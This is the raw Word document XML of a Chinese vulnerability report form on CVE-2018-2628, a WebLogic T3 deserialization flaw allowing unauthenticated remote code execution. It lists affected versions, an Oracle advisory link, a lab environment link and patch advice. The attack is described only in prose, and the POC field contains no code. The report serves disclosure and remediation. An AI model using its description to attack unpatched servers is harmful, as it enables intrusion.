                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>提交时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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2023/7/20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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漏洞发现者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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CNVD-ID：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roma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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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提交者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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搜索关键词</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roma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13" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>影响范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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Weblogic 10.3.6.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="48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Weblogic 12.1.3.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="48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Weblogic 12.2.1.2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="48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Weblogic 12.2.1.3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13" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>来源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html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13" w:type="dxa"/>
          <w:trHeight w:val="412" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞简介</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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2018年4月18日，Oracle官方发布的CPU（Critical Patch Update）修复了编号为`CVE-2018-2628的反序列化漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>3002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>受影响的WebLogic的WLS核心组件存在严重的安全漏洞，通过T3协议可以在前台无需账户登录的情况下进行远程任意代码执行，且CVE-2018-2628为CVE-2017-3248黑名单修复的绕过。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13" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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通过WebLogic管理服务器所在的IP、端口上的T3服务握手，向目标WebLogic服务器发送恶意的T3请求对象。目标服务器接收到请求后，尝试反序列化恶意的T3请求对象。在反序列化过程中，由于WebLogic Server WLS Core Components中的漏洞，在处理特定的恶意对象数据时存在安全漏洞。恶意对象数据中包含可触发命令执行的代码，目标服务器在反序列化恶意对象时，会执行恶意代码，从而导致远程命令执行。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13" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>参考链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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0"/>
              <w:spacing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http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html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13" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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spacing w:line="480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靶场信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>https://vulhub.org/#/environments/weblogic/CVE-2018-2628/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13" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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spacing w:line="480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POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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48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如前文所示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13" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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spacing w:line="480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修复方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>Oracle官方已经在4月份的关键补丁更新（CPU）中修复了该漏洞，强烈建议受影响的用户尽快升级更新进行防护。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>Oracle官方补丁需要用户持有正版软件的许可账号，使用该账号登陆https://support.oracle.com后，可以下载最新补丁</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:sectPr>
      <w:footerReference r:id="rId4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rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr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6" name="文本框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  <w:rPr>
                              <w:rFonts w:eastAsia="等线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g/nr5SwCAABX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rPr>
                        <w:rFonts w:eastAsia="等线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right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300">
          <wp:extent cx="899160" cy="359410"/>
          <wp:effectExtent l="0" t="0" r="0" b="6350"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160" cy="3594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C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55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>
    <w:nsid w:val="DE24983B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DE24983B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DC9D9C1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FDC9D9C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1A6A233"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="51A6A233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480" w:firstLine="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gyNjk1NzJiZmIzMzU2Y2M2MjZlODViNjBkY2Y1N2MifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="05D969B9"/>
    <w:rsid w:val="000A43E2"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006523CE"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00B907C6"/>
    <w:rsid w:val="00D04A3B"/>
    <w:rsid w:val="00DD20FE"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00F66312"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="0128341F"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0AB63E63"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="23B20419"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="2A511BB9"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3AD42249"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="3F3074FF"/>
    <w:rsid w:val="433834D6"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="57890007"/>
    <w:rsid w:val="57911B2B"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="5FCA04E2"/>
    <w:rsid w:val="68756C25"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6CE024ED"/>
    <w:rsid w:val="6DFB5D0A"/>
    <w:rsid w:val="6EAD34A8"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78A85C56"/>
    <w:rsid w:val="7EE92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" w:semiHidden="0" w:name="heading 2"/>
    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="9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qFormat="1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iPriority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2"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="100" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="400" w:lineRule="exact"/>
      <w:jc w:val="left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1"/>
    <w:next w:val="1"/>
    <w:link w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="400" w:lineRule="exact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qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="30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cs="黑体"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="en-US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Body Text Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000"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0">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0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13">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="16">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="17">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="1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8">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="21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2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3">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="15"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr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3749</Words>
  <Characters>11586</Characters>
  <Lines>42</Lines>
  <Paragraphs>11</Paragraphs>
  <TotalTime>32</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13149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2023-07-20T15:27:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>耿耿星河</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-22T08:26:25Z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F9D68337191C4EC499F259E577FDF3F3_13</vt:lpwstr>
  </property>
</Properties>
</file>